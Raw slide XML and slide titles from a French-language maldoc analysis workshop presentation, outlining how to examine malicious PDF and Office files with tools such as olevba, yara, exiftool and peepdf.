                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vbaProject.bin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openxml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3"/>
            <a:ext cx="1709159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  <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>ocument.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docx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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>vbaProject.bin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openxml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2"/>
            <a:ext cx="1886698" cy="47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document.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docm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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>vbaProject.bin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464728" y="2837204"/>
            <a:ext cx="2512912" cy="195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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metadonnées</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRP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exiftool</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean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564629" cy="194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Détection signatures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zipdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>yara</a:t>
            </a:r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604324" cy="19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VBA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olevba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015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MS OFFICE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Determiner le type de document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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outils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d’identification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MS OFFICE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Determiner le type de document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outils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d’identification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Cherchez des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoCs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MS OFFICE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Determiner le type de document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outils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d’identification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JavaScript,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Cherchez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IoCs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Extraire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les scripts et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continuer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l’analyse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3170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Scrips </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>malveillants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>leur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>utilisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>malveillant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Obfuscation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Scrips </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>malveillants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>leur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>utilisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>malveillant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Comment  contourner l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>obfuscation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Maldoc Analysis Workshop p.1</Template>
  <TotalTime>0</TotalTime>
  <Words>4696</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>917</Paragraphs>
  <Slides>79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</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>MAldoc ANALYSIS WORKSHOP </vt:lpstr>
      <vt:lpstr>RECAP </vt:lpstr>
      <vt:lpstr>Badpdf.pdf</vt:lpstr>
      <vt:lpstr>Baddoc.doc </vt:lpstr>
      <vt:lpstr>Analyse  JAVASCRIPT</vt:lpstr>
      <vt:lpstr>Contenu</vt:lpstr>
      <vt:lpstr>Contenu</vt:lpstr>
      <vt:lpstr>Contenu</vt:lpstr>
      <vt:lpstr>Contenu</vt:lpstr>
      <vt:lpstr>Attention</vt:lpstr>
      <vt:lpstr>Attention</vt:lpstr>
      <vt:lpstr>Comment sont-ils utilisés les maldocs ?</vt:lpstr>
      <vt:lpstr>Comment sont-ils utilisés les maldocs ?</vt:lpstr>
      <vt:lpstr>Comment sont-ils utilisés les maldocs ?</vt:lpstr>
      <vt:lpstr>Comment sont-ils utilisés les maldocs ?</vt:lpstr>
      <vt:lpstr>Comment sont-ils utiliSes les scripts ?</vt:lpstr>
      <vt:lpstr>Comment sont-ils utiliSes les scripts ?</vt:lpstr>
      <vt:lpstr>Comment sont-ils utiliSes les scripts ?</vt:lpstr>
      <vt:lpstr>Comment sont-ils utiliSes les scripts ?</vt:lpstr>
      <vt:lpstr>JAVASCRIPT Malicieux</vt:lpstr>
      <vt:lpstr>Indicateurs </vt:lpstr>
      <vt:lpstr>Indicateurs </vt:lpstr>
      <vt:lpstr>Indicateurs </vt:lpstr>
      <vt:lpstr>Indicateurs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TECHNIQUES D’OBFUSCATION</vt:lpstr>
      <vt:lpstr>TECHNIQUES D’OBFUSCATION</vt:lpstr>
      <vt:lpstr>TECHNIQUES D’OBFUSCATION</vt:lpstr>
      <vt:lpstr>TECHNIQUES D’OBFUSCATION</vt:lpstr>
      <vt:lpstr>FORMATAGE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CODE etranger</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Obscurcissement des donnees</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SUBSTITUTION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>TIPS</vt:lpstr>
      <vt:lpstr>peepdf</vt:lpstr>
      <vt:lpstr>Spidermonkey</vt:lpstr>
      <vt:lpstr>Demo time</vt:lpstr>
      <vt:lpstr>Analyse ms office</vt:lpstr>
      <vt:lpstr>Contenu</vt:lpstr>
      <vt:lpstr>Contenu</vt:lpstr>
      <vt:lpstr>Contenu</vt:lpstr>
      <vt:lpstr>Attaques contre ms office</vt:lpstr>
      <vt:lpstr>Analyse maldocs ms office </vt:lpstr>
      <vt:lpstr>Analyse maldocs ms office </vt:lpstr>
      <vt:lpstr>Analyse maldocs ms office </vt:lpstr>
      <vt:lpstr>Analyse maldocs ms office </vt:lpstr>
      <vt:lpstr>FORMATS ms office</vt:lpstr>
      <vt:lpstr>Structured storage format</vt:lpstr>
      <vt:lpstr>OLETOOLS</vt:lpstr>
      <vt:lpstr>FORMAT openxml</vt:lpstr>
      <vt:lpstr>FORMAT openxml</vt:lpstr>
      <vt:lpstr>FORMAT openxml</vt:lpstr>
      <vt:lpstr>outils</vt:lpstr>
      <vt:lpstr>Analyser les MS OFFICE</vt:lpstr>
      <vt:lpstr>Analyser les MS OFFICE</vt:lpstr>
      <vt:lpstr>Analyser les MS OFFICE</vt:lpstr>
      <vt:lpstr>Demo time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2021-01-15T11:29:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-22T11:40:49Z</dcterms:modified>
</cp:coreProperties>
</file>